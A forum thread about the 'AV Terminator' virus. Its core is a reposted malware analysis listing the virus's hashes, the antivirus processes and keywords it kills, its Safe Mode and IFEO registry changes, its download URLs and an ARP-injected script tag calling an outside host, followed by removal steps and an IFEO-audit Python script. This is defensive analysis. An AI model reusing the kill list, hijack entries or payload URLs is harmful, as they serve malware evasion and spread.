Is this the latest virus? As soon as I search for keywords like "杀毒 (antivirus), 木马 (trojan), 瑞星 (Rising), 江民 (Jiangmin)..." IE closes automatically. My Rising firewall, monitoring center and IE anti-leak wall are all up to date, so why does every time...

My browser closes itself whenever I search for 'virus' (病毒). What is going on?? Urgent urgent urgent

You have been hit by AV Terminator (AV终结者). This virus comes bundled with a virus called Viking (威金) and another one, the 景象 virus; it is very hard to kill. Your current antivirus is greyed out and cannot be opened. The fix: on someone else's computer, download the dedicated removal tools, burn them to a disc, and run them from the disc to kill it, because the virus cannot modify files on a disc. If that does not work, the only option is to reinstall the system, which requires formatting the drive. That virus is multi-purpose; to remove it completely you need 3 tools:
Latest Rising (瑞星) version: how to download: search baidu.com for 丁香鱼瑞星, and search baidu.com for 瑞星升级保姆 (the Rising update helper)
Search baidu.com for the Viking internet-cafe removal edition (威金网吧专杀版)
Search baidu.com for the AV removal tool (AV专杀). Get all of them; run the Viking tool first, then the AV tool, and after that finish off with Rising, and everything will be OK.
If that does not work, the only option is to format the hard disk and reinstall.

Check whether you have installed some other malicious or unfamiliar software. Remember not to wander onto unfamiliar sites to look at XX pictures or movies.

Recently many people have found that they cannot open antivirus software or anti-malware tools, or even any window whose title contains the word "virus". Today I received exactly such a sample. Previously
this could be called a virus that combines the traits of almost every virus; other than file infection, it arguably outdoes even Panda (熊猫)!
Virus characteristics:
1. Breaks Safe Mode
2. Terminates the processes of common antivirus software and anti-malware tools
3. Monitors windows
4. Disables Automatic Updates and the Windows Security Center
5. Blocks the display of hidden files
6. Downloads trojans
7. IFEO image hijacking
8. Corrupts GHOST boot files
9. Every drive letter has an autorun-linked startup file, so it triggers again even after you reinstall the system partition

Analysis report
File: 1201AEC1.exe
Size: 36435 bytes
MD5: 23D80E8E5C2B7EB19E006E80C9BD4BFB
SHA1: E760703C8776C652B424FA62AF945434FB786BE5
CRC32: 27CA1195
Packer: UPX
After the virus runs:
It drops, under C:\Program Files\Common Files\Microsoft Shared\MSInfo\, a dll whose file name is likewise a combination of 8 digits and letters, together with a dat file of the same name.
On my machine it was C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dll
This random value is probably derived from the machine code.
The dll injects itself into the Explorer process, Timplatform and the ctfmon process.

It monitors and closes the following processes and windows:
AntiVirus
TrojanFirewall
Kaspersky
JiangMin
KV200
kxp
Rising
RAV
RFW
KAV200
KAV6
McAfe
Network Associates
TrustPort
NortonSymantec
SYMANT~1
Norton SystemWorks
ESET
Grisoft
F-Pro
Alwil Software
ALWILS~1
F-Secure
ArcaBit
Softwin
ClamWin
DrWe
Fortineanda Software
Vba3
Trend Micro
QUICKH~1
TRENDM~1
Quick Heal
eSafewido
Prevx1
ers
avg
Ikarus
SophoSunbeltPC-cilli
ZoneAlar
Agnitum
WinAntiVirus
AhnLab
Normasurfsecret
Bullguard\Blac
360safe
SkyNet
Micropoint
Iparmor
ftc
mmjk2007
Antiy Labs
LinDirMicro Lab
Filseclab
ast
System Safety Monitor
ProcessGuard
FengYun
Lavasoft
NOD3
mmsk
The Cleaner
Defendio
kis6Beheadsreng
IceSword
HijackThis
killbox
procexp
Magicset
EQSysSecureProSecurity
Yahoo!
Google
baidu
P4P
Sogou PXP
ardsys
超级兔子木马
KSysFiltsys
KSysCallsys
AVK
K7
Zondex
blcorp
Tiny Firewall Pro
Jetico
HAURI
CA
kmx
PCClear_Plus
Novatix
Ashampoo
WinPatrol
Spy Cleaner Gold
CounterSpy
EagleEyeOS
Webroot
BufferZ
avp
AgentSvr
CCenter
Rav
RavMonD
RavStub
RavTask
rfwcfg
rfwsrv
RsAgent
Rsaupd
runiep
SmartUp
FileDsty
RegClean
360tray
360Safe
360rpt
kabaload
safelive
Ras
KASMain
KASTask
KAV32
KAVDX
KAVStart
KISLnchr
KMailMon
KMFilter
KPFW32
KPFW32X
KPFWSvc
KWatch9x
KWatch
KWatchX
TrojanDetector
UpLive.EXE
KVSrvXP
KvDetect
KRegEx
kvol
kvolself
kvupload
kvwsc
UIHost
IceSword
iparmo
mmsk
adam
MagicSet
PFWLiveUpdate
SREng
WoptiClean
scan32
hcfg32
mcconsol
HijackThis
mmqczj
Trojanwall
FTCleanerShell
loaddll
rfwProxy
KsLoader
KvfwMcl
autoruns
AppSvc32
ccSvcHst
isPwdSvc
symlcsvcnod32kui
avgrssvc
RfwMain
KAVPFW
Iparmor
nod32krn
PFW
RavMon
KAVSetup
NAVSetup
SysSafe
QHSET
zxsweep.
AvMonitor
UmxCfg
UmxFwHlp
UmxPol
UmxAgent
UmxAttachment
KPFW32
KPFW32X
KvXP_1
KVMonXP_1
KvReport
KVScan
KVStub
KvXP
KVMonXP
KVCenter
TrojDie
avp.com.
krepair.COM
KaScrScn.SCR
Trojan
Virus
kaspersky
jiangmin
rising
ikaka
duba
kingsoft
360safe
木马
木马
病毒
shadu
shadu
查 毒
防 毒
反 病 毒
专杀
专杀
卡 巴 斯 基
江 民
瑞 星
卡卡社区
金 山 毒 霸
毒霸
金 山 社 区
3 6 0 安全
恶 意 软 件
流 氓 软 件
举 报
报 警
杀 软
杀 软
防 骇

Creates, under C:\WINDOWS\Help\, a chm file whose name is likewise a combination of 8 digits and letters
Creates, under C:\WINDOWS\, an hlp file whose name is likewise a combination of 8 digits and letters
Deletes C:\WINDOWS\system32\verclsid.exe
by renaming it to verclsid.exe.bak
Drops 41115BDD.exe (random 8 characters) and autorun.inf onto every partition other than the system partition

Registry operations
Deletes
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
breaking Safe Mode

Modifies
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue to 0x00000000
HKU\S-1-5-21-1085031214-1078145449-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden to 0x00000002
HKU\S-1-5-21-1085031214-1078145449-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden to 0x00000001
blocking the display of hidden files

Sets the Start value of common antivirus services to 0x00000004
e.g. HKLM\SYSTEM\ControlSet001\Services\RfwService\Start: 0x00000004

Sets HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Start
and HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\start to 0x00000004
disabling Automatic Updates

Adds IFEO image-hijack entries (my advice is to remove the hijacks with Autoruns)
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\krepair.COM
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoader.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolself.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwsc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddll.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetup.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32krn.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSET.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfg.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgent.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvc.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwall.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgent.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachment.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLive.EXE.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweep.exe

hijacked to the dat file under C:\Program Files\Common Files\Microsoft Shared\MSInfo\

Downloads dl1.exe to the temp folder
It first downloads http://google.xxxx38.org/update/down.txt to check whether the virus needs updating

then downloads each of http://google.xxxx38.org/update/wow.exe
http://google.xxxx38.org/update/mh.exe
http://google.xxxx38.org/update/wm.exe
http://google.xxxx38.org/update/my.exe
http://google.xxxx38.org/update/wl.exe
http://google.xxxx38.org/update/zt.exe
http://google.xxxx38.org/update/jh.exe
http://google.xxxx38.org/update/tl.exe
http://google.xxxx38.org/update/1.exe
http://google.xxxx38.org/update/2.exe into the Program Files folder, naming them ycnt1.exe through ycnt10.exe

I will not list what each of these files produces one by one,
but the trojan ycnt9.exe deserves a mention.
It creates C:\WINDOWS\system32\win1ogo.exe,
and this trojan attempts ARP spoofing against port 80 of every user on the LAN every 5000 ms,
injecting the code <script language=javascript src=http://google.171738.org/ad2.js></script>
so that every user on the LAN has this code injected whenever they open a web page.

After all trojan files have been planted, the artifacts are as follows:
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\msdebug.dll
C:\WINDOWS\system32\nwiztlbu.exe
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\testdll.dll
C:\WINDOWS\system32\WanPacket.dll
C:\WINDOWS\system32\win1ogo.exe
C:\WINDOWS\system32\windds32.dll
C:\WINDOWS\system32\winpcap.exe
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\system32\xpdhcp.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\Program Files\Common Files\cssrs.exe
The SREng log shows the following (this scan was taken after some cleanup; listed here ahead of time):

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe> []
<Kvsc><C:\WINDOWS\Kvsc3.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{15BD4111-4111-5BDD-115B-111BD1115BDD}><C:\Program Files\Common Files\Microsoft Shared\MSINFO\41115BDD.dll> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<Userinit><C:\WINDOWS\system32\userinit.exe,C:\Program Files\Common Files\cssrs.exe,> [N/A]
[PID: 1400][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testdll.dll] [N/A, ]
[C:\WINDOWS\system32\Kvsc3.dll] [N/A, ]

The fix is as follows:

1. Determine the name of the dll with the random 8-character name
Here we use WinRAR to find the dll's name.
Method: open winrar.exe,
Tools, View,
and in the address bar at the top go to the c:\program files\common files\microsoft shared\msinfo directory.
On this infected machine the file name was 41115bdd.dll.

2. Use a force-delete tool to delete that dll file
Here we use Xdelbox1.2.

XDelBox1.2 (DOS-level killer tool):
1. DOS-level file deletion, a new model for virus removal
2. Deletes all virus files without having to enter Safe Mode
3. Supports batch deletion of multiple files in a single reboot
4. Adding files by copying their paths is better suited to online help requests (drag and drop supported)
Note: when deleting, copy the paths of all files to be deleted, right-click in the pending-deletion list and choose import from clipboard. After importing, right-click the file to delete and choose reboot and delete now; the computer will reboot into a DOS screen to perform the deletion, and when finished will automatically reboot into your installed operating system. Save any open documents before doing this. For full details on XDelBox see help.chm in the xdelbox1.2 directory.

After restarting the machine:
3. Restore the software hijacked via IFEO
Here we use Autoruns. Since this program is itself image-hijacked, rename it to anything else first.
After opening it, find Image Hijacks.
Delete every entry except "Your Image File Name Here without a path | Symbolic Debugger for Windows 2000 | Microsoft Corporation | c:\windows\system32\ntsd.exe".

4. Now we can open SREng, heh
Open SREng:
System Repair, Advanced Repair, click Repair Safe Mode, and click Yes in the dialog that pops up.

5. Restore the display of hidden files

Copy the following into Notepad and save it as 1.reg:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"

Double-click 1.reg to import it.

Done. At this point all of the virus's restrictions on us have been lifted.

6. Remove the trojans it downloaded
Restart the machine and enter Safe Mode.
Double-click My Computer, Tools, Folder Options, View, and select "Show hidden files and folders",

then clear "Hide protected operating system files".

Open WinRAR and check the following paths, deleting whatever you find (these are the trojans the virus downloaded):
C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.dll
C:\Documents and Settings\Administrator\Local Settings\Temp\dl1.exe
C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dat (random 8-character alphanumeric)
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\WINDOWS\Help\41115BDD.chm (random 8-character alphanumeric)
C:\WINDOWS\system32\DirectX\DirectX.ini
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\msdebug.dll
C:\WINDOWS\system32\nwiztlbu.exe
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\testdll.dll
C:\WINDOWS\system32\WanPacket.dll
C:\WINDOWS\system32\win1ogo.exe
C:\WINDOWS\system32\windds32.dll
C:\WINDOWS\system32\winpcap.exe
C:\WINDOWS\system32\wpcap.dll
C:\WINDOWS\system32\xpdhcp.dll
C:\WINDOWS\41115BDD.hlp (random 8-character alphanumeric)
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\testexe.exe
C:\Program Files\Common Files\cssrs.exe
C:\Program files\ycnt1.exe~ycnt10.exe (if present)

Finally, don't forget:
7. Again using WinRAR, delete autorun.inf and 41115BDD.exe (random 8-character alphanumeric) from every partition.
Never double-click them; the best way is to view them through WinRAR.
8. Install antivirus software and protect your computer.
With this, the virus is completely removed...

All the tools used this time are attached (links guaranteed not to go dead):
xdelbox1.2
http://www.hltsoft.cn/download/soft/safetools1/xdelbox1.2.RAR

SREng
http://www.hltsoft.cn/download/soft/safetools1/SREng.rar

Autoruns
http://www.hltsoft.cn/download/soft/safetools1/Autoruns861-YYZ.rar

Please credit (风月阁) when reposting. From: http://kairizero.blog.sohu.com/
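The IFEO hijack described in the analysis above (every security tool's image redirected to the random-named .dat under MSInfo) and step 3 of the removal (keep only the ntsd.exe entry) can be audited offline from a regedit export. The following is an added example, not code from the original post or from any of the tools it links: it parses a constructed .reg fragment of the Image File Execution Options key, flags every subkey whose Debugger value is not an allowed debugger (the ntsd entry the post keeps is the allow-list), and emits the delete-key .reg lines that undo the hijack. SAMPLE_REG and the benign notepad.exe entry in it are constructed sample input, not data from the post.

```python
import re
# Constructed sample input (not from the post): a regedit export fragment of the
# IFEO key. Paths mirror the analysis above; notepad.exe is a made-up benign entry.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Your Image File Name Here without a path]
"Debugger"="c:\\windows\\system32\\ntsd.exe -d"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe]
"Debugger"="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\41115BDD.dat"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe]
"Debugger"="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\41115BDD.dat"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000002
'''

IFEO_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
ALLOWED_DEBUGGERS = ("ntsd.exe", "ntsd")  # the one entry the post says to keep


def parse_reg(text):
    """Parse a .reg export into {key_path: {value_name: value}}; strings are unescaped."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        name, _, value = line.partition("=")
        if value.startswith('"') and value.endswith('"'):
            value = re.sub(r"\\(.)", r"\1", value[1:-1])  # \\ -> \ and \" -> "
        keys[current][name.strip('"')] = value
    return keys


def find_ifeo_hijacks(text, allowed=ALLOWED_DEBUGGERS):
    """Return [(image, debugger)] for direct IFEO subkeys whose Debugger is not an
    allowed debugger: starting `image` would silently run `debugger` instead."""
    prefix = IFEO_KEY.lower() + "\\"
    hits = []
    for key, values in parse_reg(text).items():
        if not key.lower().startswith(prefix):
            continue
        image = key[len(prefix):]
        if "\\" in image:  # nested subkeys are not image entries
            continue
        debugger = values.get("Debugger")
        if not debugger:
            continue
        tail = debugger.rsplit("\\", 1)[-1].split()  # 'c:\x\ntsd.exe -d' -> ['ntsd.exe', '-d']
        exe = tail[0].strip('"').lower() if tail else ""
        if exe not in allowed:
            hits.append((image, debugger))
    return hits


def removal_reg(hits):
    """Build a .reg file that deletes the hijacked subkeys ('[-key]' deletes on import)."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for image, _ in hits:
        lines.append("[-" + IFEO_KEY + "\\" + image + "]")
    return "\n".join(lines) + "\n"
```

Export the key with `regedit /e` on the affected machine, run `find_ifeo_hijacks` on the file contents, and review the hits before importing the generated removal file.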

It is a virus,
but some critical or essential system and hardware files also have their attributes set to hidden,
so not all viruses are of a hidden nature.

Your virus is a bit of a beast.
If reinstalling the system doesn't fix it, you'll have to low-level format the hard disk.
Delete everything on the hard disk and repartition it, and that will do~~

Definitely infected, but it's no longer the latest virus; I ran into it last year and tried lots of methods, none worked.
In the end I just reinstalled.

Reinstalling the system is the cure-all for every computer problem.

    2024© 车视网